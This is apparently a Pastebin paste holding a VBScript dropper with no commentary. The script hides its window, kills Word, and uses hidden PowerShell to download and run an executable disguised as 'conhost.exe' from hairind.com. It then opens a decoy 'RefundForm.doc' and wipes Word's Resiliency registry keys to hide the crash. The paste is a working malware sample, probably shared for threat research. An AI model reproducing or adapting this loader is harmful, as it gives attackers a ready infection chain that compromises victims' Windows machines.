Advertisement
James_inthe_box

hairind

Aug 30th, 2017
256
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.16 KB | None | 0 0
  1. <script language="VBScript">
  2. Window.ResizeTo 0,0
  3. Window.moveTo -2000,-2000
  4. Set Office = CreateObject("WScript.Shell")
  5. Office.run "PowerShell -WindowStyle Hidden taskkill /f /im winword.exe;",0,true
  6. Office.run "PowerShell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://hairind.com/image/test/conhost.exe','%localAppData%\Temp\conhost.exe');",0,true
  7. Office.run "PowerShell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://hairind.com/image/test/RefundForm.doc','%windir%\Temp\RefundForm.doc');",0,true
  8. Office.run "%localAppData%\Temp\conhost.exe",0,false
  9. Office.run "PowerShell -WindowStyle Hidden Remove-Item -Path HKCU:\Software\Microsoft\Office\11.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\12.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\14.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\15.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\16.0\Word\Resiliency -recurse;",0,true
  10. Office.run "cmd.exe '/c start /MAX """" winword /q ""%windir%\Temp\RefundForm.doc""",0,false
  11. self.close
  12.  
  13. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement